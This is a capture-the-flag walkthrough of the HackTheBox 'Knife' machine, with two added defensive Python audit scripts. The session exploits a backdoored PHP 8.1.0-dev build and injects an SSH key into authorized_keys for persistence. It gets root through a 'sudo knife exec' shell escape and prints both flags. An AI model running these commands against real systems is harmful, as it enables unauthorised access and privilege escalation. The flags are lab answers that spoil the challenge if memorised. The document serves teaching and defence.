Knife

$ sudo nmap -p- -T4 -A 10.10.10.242
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
$ nikto -h http://10.10.10.242
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
$ dirb http://10.10.10.242
---- Scanning URL: http://10.10.10.242/ ----
+ http://10.10.10.242/index.php (CODE:200|SIZE:5815)                             
+ http://10.10.10.242/server-status (CODE:403|SIZE:277)
https://www.exploit-db.com/exploits/49933
https://github.com/flast101/php-8.1.0-dev-backdoor-rce
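Added example, not part of this writeup: a small Python check that parses a raw HTTP response and reports the two things the scans above surface, the X-Powered-By value advertising the backdoored PHP/8.1.0-dev build (the two links above) and the hardening headers nikto lists as absent. The sample response is constructed to match the nikto findings, not captured from the box.

```python
"""Fingerprint a raw HTTP response for the indicators the scans above report.

Added example; the SAMPLE_RESPONSE below is constructed, not captured.
"""
from typing import Dict, List, Tuple

# Version string shipped by the compromised PHP development build
# (see the exploit-db and GitHub links above).
BACKDOORED_PHP = "PHP/8.1.0-dev"

# Hardening headers nikto reported as not present.
EXPECTED_HEADERS = ("X-Frame-Options", "X-Content-Type-Options", "X-XSS-Protection")


def parse_response(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.x response into its status line and a header map.

    Header names are lower-cased so lookups are case-insensitive; the body,
    if any, is ignored. Malformed header lines are skipped rather than raised.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = lines[0]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return status, headers


def audit_headers(raw: str) -> List[str]:
    """Return a list of findings for the response; an empty list means nothing flagged."""
    _, headers = parse_response(raw)
    findings: List[str] = []
    powered_by = headers.get("x-powered-by", "")
    if BACKDOORED_PHP in powered_by:
        findings.append(f"backdoored PHP build advertised: {powered_by}")
    for name in EXPECTED_HEADERS:
        if name.lower() not in headers:
            findings.append(f"missing hardening header: {name}")
    return findings


# Constructed sample matching what nikto reported above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_RESPONSE):
        print(finding)
```

To run it against a live host, feed audit_headers the response bytes decoded from a socket or rebuild the header map from http.client's getheaders(); the checks themselves do not depend on how the response was obtained.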
kali@kali:~/0.htb/machines/Knife242$ python3 49933.py 
$ whoami
james

$ cat /home/james/user.txt
dde53b3e0ea16ef76edd6b8474a499fc

$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeYZ9sJVrH4IfMx50cZSfpnsdi98SgU4WtQHUjXcyHsx9jD5RJaviSdt3JijTSP4+ctXbMoZWqv/dDFKSN3N2aG8U2gjhaabAzQU8ICo4Ow/qZNlyNLW4mD7SJK44rmga6c03PsygOH+E0UQpW/cOgUym7Oaj0qYL5caN0q/0b5lJqTsMpxOmUz6+TXFiVH+PjaLb5RJo8YRbGZN51cY9/hFmuXuNuXfGRPNS7VAaun9Cu+tLqgx334GvqriUdU6HxT5N/wkTy4wum/Oi94/o4rzbLTZYhCpQMtm1k1CVht9YO6RpjioB3hUTKR7UKtgBoo6d0fNVZld0kRP8jf9l995/6QOfUGbCK2eHAxKdBqFqa5cdRMezFE1DrVDrNX1dbYHJOs8QFJMp042Q+ecoORleFfhVA5ZtcGTsXkA9peXC9SAkec3PtuUEULXS5ait6hEqQk7Tzps4j8LG+vtL3TTWZDLN/4MVLudWZi8Y4or7yrCTwh7HKFfiWR2NG//E= kali@kali > /home/james/.ssh/authorized_keys
kali@kali:~/0.htb/machines/Knife242$ ssh james@10.10.10.242
james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

james@knife:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
... ... 
james:x:1000:1000:james:/home/james:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
opscode:x:997:997::/opt/opscode/embedded:/usr/sbin/nologin
opscode-pgsql:x:996:996::/var/opt/opscode/postgresql:/bin/sh
james@knife:~$ sudo knife exec --exec "exec '/bin/sh -i' " 
# cat /root/root.txt
b8764300e633b33d84dfb8717bf719b9
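Added example, not part of this writeup: a Python audit of `sudo -l` output that parses each rule and flags NOPASSWD entries on binaries whose normal features run caller-supplied code, which is exactly how the single rule above became a root shell via knife exec. The sample input is the sudo -l output shown above; the SHELL_CAPABLE table is a small hand-picked set assumed for illustration, not an exhaustive list.

```python
"""Audit `sudo -l` output for rules that hand out a root shell.

Added example for this writeup. SHELL_CAPABLE is a small illustrative
set (assumption, not an exhaustive list); knife is on it because the
session above shows `knife exec` spawning a root shell.
"""
import re
from dataclasses import dataclass
from typing import List

# Binaries whose documented features execute arbitrary code or commands.
SHELL_CAPABLE = {
    "knife": "knife exec runs arbitrary Ruby",
    "vim": "editor can spawn a shell",
    "python3": "interpreter runs arbitrary code",
    "find": "-exec runs arbitrary commands",
}

# Matches rule lines such as "    (root) NOPASSWD: /usr/bin/knife"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


@dataclass
class SudoRule:
    runas: str      # run-as user (group part after ':' dropped)
    nopasswd: bool  # True when the NOPASSWD tag is present
    command: str    # command spec, e.g. "/usr/bin/knife" or "ALL"


def parse_sudo_l(output: str) -> List[SudoRule]:
    """Extract rules from the 'may run the following commands' section.

    The Defaults block that precedes it is ignored.
    """
    rules: List[SudoRule] = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append(SudoRule(runas, nopasswd, cmd.strip()))
    return rules


def risky_rules(output: str) -> List[str]:
    """Return human-readable findings for rules that give root code execution."""
    findings: List[str] = []
    for rule in parse_sudo_l(output):
        if rule.runas not in ("root", "ALL"):
            continue
        mode = "without password" if rule.nopasswd else "with password"
        if rule.command == "ALL":
            findings.append(f"ALL as {rule.runas} {mode}: unrestricted")
            continue
        name = rule.command.split("/")[-1].split()[0]  # basename, args dropped
        if name in SHELL_CAPABLE:
            findings.append(f"{rule.command} as {rule.runas} {mode}: {SHELL_CAPABLE[name]}")
    return findings


# Sample input: the sudo -l output from the session above.
SAMPLE_SUDO_L = """Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

if __name__ == "__main__":
    for finding in risky_rules(SAMPLE_SUDO_L):
        print(finding)
```

The fix on the defending side is to drop the rule or restrict it to the specific knife subcommand the user actually needs, since any rule on a binary in this class is equivalent to `(root) NOPASSWD: ALL`.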